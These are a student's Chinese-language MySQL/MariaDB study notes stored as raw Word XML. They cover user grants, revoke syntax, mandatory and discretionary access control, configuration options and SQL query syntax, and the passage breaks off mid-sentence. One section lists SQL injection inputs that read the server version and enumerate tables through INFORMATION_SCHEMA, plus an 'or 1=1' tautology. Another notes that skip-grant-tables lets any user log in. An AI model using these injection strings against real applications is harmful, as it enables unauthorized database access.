        <w:t>| Grants for guest@localhost                                                                                   |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+--------------------------------------------------------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| GRANT USAGE ON *.* TO 'guest'@'localhost' IDENTIFIED BY PASSWORD '*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9' |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| GRANT ALL PRIVILEGES ON `collage`.`ip` TO 'guest'@'localhost'                                                |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| GRANT SELECT, INSERT ON `collage`.`pe_scan` TO 'guest'@'localhost'                                           |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| GRANT SELECT ON `collage`.`birth` TO 'guest'@'localhost'                                                     |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+--------------------------------------------------------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/etc/my.cnf </w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>[mysqld]</w:t>
      </w:r>
      <w:r>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:t>skip-grant-tables</w:t>
      </w:r>
      <w:r>
        <w:t>，那么任何一个用户名都可以登录，即使是不存在的</w:t>
      </w:r>
      <w:r>
        <w:t>Mysql -u xxx,</w:t>
      </w:r>
      <w:r>
        <w:t>虽然没有什么权限，看到的表就只有</w:t>
      </w:r>
      <w:r>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t>。不够这个我记得我后来删除了。好吧，要重新把这句加上重启以后再去掉就好了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>删除权限：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>REVOKE delete on collage.PE_scan from guest@localhost;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>REVOKE &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>权限</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;, [, &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>权限</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;]…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>ON &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>对象类型</w:t>
      </w:r>
      <w:r>
        <w:t>&gt; &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>对象名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;[, &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>对象类型</w:t>
      </w:r>
      <w:r>
        <w:t>&gt; &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>对象名</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;]…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>FROM &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;[, &lt;</w:t>
      </w:r>
      <w:r>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;]…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>[CASCADE|RESTRICT];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>（强制存取控制方法）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MAC </w:t>
      </w:r>
      <w:r>
        <w:t>对模式的授权：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  label</w:t>
      </w:r>
      <w:r>
        <w:t>的比较</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>DBMS</w:t>
      </w:r>
      <w:r>
        <w:t>管理的全部实体分为主体和客体两大类：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>主体是系统中的活动实体，包括</w:t>
      </w:r>
      <w:r>
        <w:t>DBMS</w:t>
      </w:r>
      <w:r>
        <w:t>所管理的实际用户和代表用户的各进程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>客体是系统中的被动实体，受主体操纵，包括文件、基表、索引、视图等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>对于主体和客体，</w:t>
      </w:r>
      <w:r>
        <w:t>DBMS</w:t>
      </w:r>
      <w:r>
        <w:t>为它们每个实例（值）指派一个敏感度标记（</w:t>
      </w:r>
      <w:r>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>敏感度标记被分成若干级别：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>例如绝密</w:t>
      </w:r>
      <w:r>
        <w:t>(Top Secret)</w:t>
      </w:r>
      <w:r>
        <w:t>、机密</w:t>
      </w:r>
      <w:r>
        <w:t>(Secret)</w:t>
      </w:r>
      <w:r>
        <w:t>、可信</w:t>
      </w:r>
      <w:r>
        <w:t>(Confidential)</w:t>
      </w:r>
      <w:r>
        <w:t>、公开</w:t>
      </w:r>
      <w:r>
        <w:t>(Public)</w:t>
      </w:r>
      <w:r>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>主体的敏感度标记称为许可证级别</w:t>
      </w:r>
      <w:r>
        <w:t>(Clearance Level)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>客体的敏感度标记称为密级（</w:t>
      </w:r>
      <w:r>
        <w:t>Classification Level</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>仅当主体的许可证级别大于或等于客体的密级时，该主体才能读取相应的客体；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>仅当主体的许可证级别等于客体的密级时，该主体才能写相应的客体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>GRANT</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>REVOKE</w:t>
      </w:r>
      <w:r>
        <w:t>将安全标记授予</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>取消于用户。数据对象的安全标记设置是在创建的时候，比如说字段的创建语句里面加上了</w:t>
      </w:r>
      <w:r>
        <w:t>with xxxLabel</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>自主存取控制</w:t>
      </w:r>
      <w:r>
        <w:t>(DAC)</w:t>
      </w:r>
      <w:r>
        <w:t>方法是指我一直在用的授权，语句中有数据对象、操作类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>视图是实施安全性控制的一种有效机制。为不同的用户创建不同的视图，这样就能做到</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>允许一个表，但是不允许对某些列、某些行</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">GRANT ALL PRIVILEGES  ON CS_Student TO </w:t>
      </w:r>
      <w:r>
        <w:t>张明</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">;   </w:t>
      </w:r>
      <w:r>
        <w:t>虽然是个视图，数据组织和数据表一样，</w:t>
      </w:r>
      <w:r>
        <w:t>grant</w:t>
      </w:r>
      <w:r>
        <w:t>的使用与数据库一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>my.ini</w:t>
      </w:r>
      <w:r>
        <w:t>配置文件</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">max_connect_errors  </w:t>
      </w:r>
      <w:r>
        <w:t>限制登录失败次数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [collage]&gt; select * from PE_scan;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR 1142 (42000): SELECT command denied to user 'guest'@'localhost' for table 'PE_scan'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>厉害了我的哥，因为我设置的是</w:t>
      </w:r>
      <w:r>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:t>，而在</w:t>
      </w:r>
      <w:r>
        <w:t>grant</w:t>
      </w:r>
      <w:r>
        <w:t>给予权限的时候给的是</w:t>
      </w:r>
      <w:r>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>后来</w:t>
      </w:r>
      <w:r>
        <w:t>select * from mysql.user;</w:t>
      </w:r>
      <w:r>
        <w:t>查看到</w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:t>有两个账户一个是</w:t>
      </w:r>
      <w:r>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:t>一个是</w:t>
      </w:r>
      <w:r>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t>，本地登录上去的</w:t>
      </w:r>
      <w:r>
        <w:t>guest</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>其余参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>当外部锁定（</w:t>
      </w:r>
      <w:r>
        <w:t>external-locking</w:t>
      </w:r>
      <w:r>
        <w:t>）起作用时，每个进程若要访问数据表，则必须等待之前的进程完成操作并解除锁定。所以有多台服务器的时候就需要将</w:t>
      </w:r>
      <w:r>
        <w:t>skip_external_locking on</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>其他语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>varchar(3)</w:t>
      </w:r>
      <w:r>
        <w:t>可以存</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个中文（不是一个）（我字符集已经设定为是</w:t>
      </w:r>
      <w:r>
        <w:t>utf8</w:t>
      </w:r>
      <w:r>
        <w:t>），在交互模式中存超字段设置量的数据也不会报错。因为</w:t>
      </w:r>
      <w:r>
        <w:t>varchar</w:t>
      </w:r>
      <w:r>
        <w:t>是动态大小，所以必须给出最大多少字节，而</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>其实就是</w:t>
      </w:r>
      <w:r>
        <w:t>int(11)</w:t>
      </w:r>
      <w:r>
        <w:t>，所以可以不需要在后面加上多少字节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>目前只有</w:t>
      </w:r>
      <w:r>
        <w:t>use +</w:t>
      </w:r>
      <w:r>
        <w:t>数据库、</w:t>
      </w:r>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>quit</w:t>
      </w:r>
      <w:r>
        <w:t>可以不打分号，还有编程执行语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">select name,identity from student where class_num='153040102' or class_num='153040101'; </w:t>
      </w:r>
      <w:r>
        <w:t>表名字之间的逗号前往不能丢</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>字符串匹配：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>为了找出以</w:t>
      </w:r>
      <w:r>
        <w:t>“b”</w:t>
      </w:r>
      <w:r>
        <w:t>开头的名字：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mysql&gt; SELECT * FROM pet WHERE name LIKE "b%";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>为了找出以</w:t>
      </w:r>
      <w:r>
        <w:t>“fy”</w:t>
      </w:r>
      <w:r>
        <w:t>结尾的名字：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>mysql&gt; SELECT * FROM pet WHERE name LIKE "%fy";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>联合查询：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> select count(*) from jwc.teacher where '1'='1' union select count(*) from jwc.student limit 10;</w:t>
      </w:r>
      <w:r>
        <w:t>联合查询要求输出的字段数目是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>字符串单双引号都支持，但是不能混用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">insert into table]_name values(xx,xx,xxx) </w:t>
      </w:r>
      <w:r>
        <w:t>这会插入一条记录，</w:t>
      </w:r>
      <w:r>
        <w:t>values</w:t>
      </w:r>
      <w:r>
        <w:t>中必须要全填，即使设定字段类型允许为空</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>INSERT INTO posts (title, content, user) VALUES (%s, %s, %s);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">abc', version(), 'xxb') -- </w:t>
      </w:r>
      <w:r>
        <w:t>可以知道</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Result: 5.5.37-0ubuntu0.14.04.1  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">abc', (SELECT table_name FROM INFORMATION_SCHEMA.TABLES limit 1), 'xxb') --   </w:t>
      </w:r>
      <w:r>
        <w:t>尝试查看本数据库中有什么表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">abc', (SELECT table_name FROM INFORMATION_SCHEMA.TABLES order by CREATE_TIME limit 1), 'xxb') --  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">abc', (SELECT table_name FROM INFORMATION_SCHEMA.TABLES where table_name not in ('post', 'user') order by CREATE_TIME limit 1), 'xxb') --  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select count(*) from student  where id='2015141462109'or 1=1%00;</w:t>
      </w:r>
      <w:r>
        <w:t>这套语句是正确的，注意最后一个引号与</w:t>
      </w:r>
      <w:r>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t>之间没有空格，但是成功了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">CREATE TABLE myCity LIKE City  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建出来的叫做影子表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>update exam set answer='</w:t>
      </w:r>
      <w:r>
        <w:t>五指分开</w:t>
      </w:r>
      <w:r>
        <w:t>',A=0,B=1 where question='</w:t>
      </w:r>
      <w:r>
        <w:t>单选题：发上手飘球时，击球的时候应（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select * from table limit m,n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT * FROM route LIMIT 10</w:t>
      </w:r>
      <w:r>
        <w:t>查询前</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>条（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&lt;=&gt;0,10 </w:t>
      </w:r>
      <w:r>
        <w:t>表示从第一条记录开始的</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>条记录。注意这里数数是从</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始。所以就能使用程序</w:t>
      </w:r>
      <w:r>
        <w:t>0,20   20,40  40,60</w:t>
      </w:r>
      <w:r>
        <w:t>这样）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>order/group by</w:t>
      </w:r>
      <w:r>
        <w:t>加上要排序的字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">group by </w:t>
      </w:r>
      <w:r>
        <w:t>是排序以后同值合并，而不是分组。常用于对消费记录表进行统计</w:t>
      </w:r>
      <w:r>
        <w:t>SELECT Customer,SUM(OrderPrice) FROM Orders GROUP BY Customer</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>不够</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">group by </w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>GROUP_CONCAT</w:t>
      </w:r>
      <w:r>
        <w:t>共同使用就是很好的分组显示，</w:t>
      </w:r>
      <w:r>
        <w:t>SELECT sex,GROUP_CONCAT(name) FROM employee GROUP BY sex;</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select * from birth order by birthday limit 3 where birthday&gt;311</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>order by</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:t>必须要是在最后面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>insert into test set birthday=2 where name ='</w:t>
      </w:r>
      <w:r>
        <w:t>转存表</w:t>
      </w:r>
      <w:r>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果这个</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>已经存在就会报错，这条语句不能起到</w:t>
      </w:r>
      <w:r>
        <w:t>update</w:t>
      </w:r>
      <w:r>
        <w:t>的作用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>我在想会不会有人开着数据库的端口，而且密码还是默认的空？！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">select * </w:t>
      </w:r>
      <w:r>
        <w:t>的时候越下面的记录越是最近插进去的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>predicate:</w:t>
      </w:r>
      <w:r>
        <w:t>判定条件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>引导的子句只能返回一个字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">exists </w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sql </w:t>
      </w:r>
      <w:r>
        <w:t>返回结果集为真）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>而不管结果集返回的是什么。与</w:t>
      </w:r>
      <w:r>
        <w:t>IN</w:t>
      </w:r>
      <w:r>
        <w:t>的区别是可以返回一个结果集</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">not exists (sql </w:t>
      </w:r>
      <w:r>
        <w:t>不返回结果集为真）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT ID,NAME FROM A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ID IN (SELECT AID FROM B) </w:t>
      </w:r>
      <w:r>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>》</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE A.ID=B.AID) </w:t>
      </w:r>
      <w:r>
        <w:t>配合连接子查询</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>据说</w:t>
      </w:r>
      <w:r>
        <w:t>exists</w:t>
      </w:r>
      <w:r>
        <w:t>的效率查找起来比</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>好，应该是不会执行索引的原因</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>下面是对</w:t>
      </w:r>
      <w:r>
        <w:t>exists</w:t>
      </w:r>
      <w:r>
        <w:t>的理解：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">ID NAME </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1   A1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2   A2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>3   A3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ID AID NAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1   1     B1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">2   2     B2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>3   2     B3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>和表</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
